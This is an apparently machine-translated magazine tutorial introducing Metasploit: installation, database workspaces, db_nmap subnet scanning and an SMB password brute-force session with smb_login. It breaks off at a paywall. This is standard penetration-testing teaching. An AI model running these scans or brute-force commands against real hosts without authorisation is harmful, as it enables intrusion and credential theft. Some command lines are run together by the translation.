The content of the article
The Metasploit Framework is the largest and most out of all the frameworks for operation and post-operation. Even if you do not use it yourself, you must have met quite a few mentions of MSF in our articles. However, there was no introductory article on it in Hacker, and if it was, then so long ago that it does not count. I will try to start from the very beginning, and at the same time I will tell you exactly how this framework is used by my team, and I will give various practical tips.
All information is provided for informational purposes only. Neither the editors nor the author are liable for any possible harm caused by the information in this article.
Install Metasploit Framework
In distributions intended for penetration testing (for example, Kali or Parrot OS), this product is either preinstalled or is easily installed with the following command:
apt install metasploit-framework
If you want to use the Metasploit Framework, for example, in Ubuntu, then it can be installed from the official repository. To do this, type the following directives in the console:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstallsudo chmod 755 msfinstallsudo ./msfinstall
Quite often, Metasploit users have to break networks containing a lot of hosts. And there comes a time when the accumulation of all the information received takes an unacceptably long time. That's when you start to appreciate the ability of the Metasploit Framework to work with PostgreSQL. Metasploit itself can save and conveniently formalize the received information thanks to the msfdb module. To work with databases, you must start the service
postgresql and create a base for Metasploit.
service postgresql startmsfdb init
You can check the connection to the database from the framework itself by running the command
To make it more convenient to work with different areas (hosts, networks or domains) and share data for structuring, msfdb has support for the so-called workspace. Let's add a new space to our project.
> workspace -a xakep
Now we operate in the created workspace. Imagine that we are on the network 192.168.6.0.24. Let's look for available hosts in it. For this we will use
Nmapbut from Metasploit and linked to the current database –
> db_nmap -O 192.168.6.0/24
The output of Nmap itself is not interesting to us: everything that is needed will be stored in the database. For example, we already have all scanned hosts and we can view them in one list using the command
But along with the hosts, all services were saved, the list of which we now also always have at hand. At the same time, we can see how all the services on the ports are, as well as a list of services for a specific host.
The msfdb database has a very cool feature – saving all found credentials. I will talk about this function later, and first a few words about the capabilities of brute force that the framework has. A complete list of information to be processed for collecting credentials can be obtained with the following command:
> search type auxiliary/scanner -S "_login"
Pay attention to SMB. To find out what a particular module and its description are intended for (with reference to cvedetails), and also to see the data that needs to be passed as parameters, use the command
Let's choose this module, set the domain name, username, the host that interests us and the list of passwords.
msf5 > use auxiliary/scanner/smb/smb_loginmsf5 auxiliary(scanner/smb/smb_login) > set RHOSTS 192.168.6.129msf5 auxiliary(scanner/smb/smb_login) > set SMBUser rootmsf5 auxiliary(scanner/smb/smb_login) > set PASS_FILE /home/ralf/tmp/pass.txtmsf5 auxiliary(scanner/smb/smb_login) > set SMBDomain DOMAINmsf5 auxiliary(scanner/smb/smb_login) > run
If the user found is an administrator, Metasploit will inform us about this, which is very convenient. But in our network there can be 100 cars and even more, and many services are probably running on them. As a rule, it is possible to collect a lot of credentials using only brute force modules. Using msfdb allows you not to waste time collecting all your logins, hashes, passwords, as they automatically remain in the credential storage, which can be viewed with the command
Continuation is available only to participants
Materials from the latest issues become available separately only two months after publication. To continue reading, you must become a member of the Xakep.ru community.
Join the Xakep.ru Community!
Membership in the community during the specified period will open you access to ALL Hacker materials, increase your personal cumulative discount and allow you to accumulate a professional Xakep Score!
I am already a member of Xakep.ru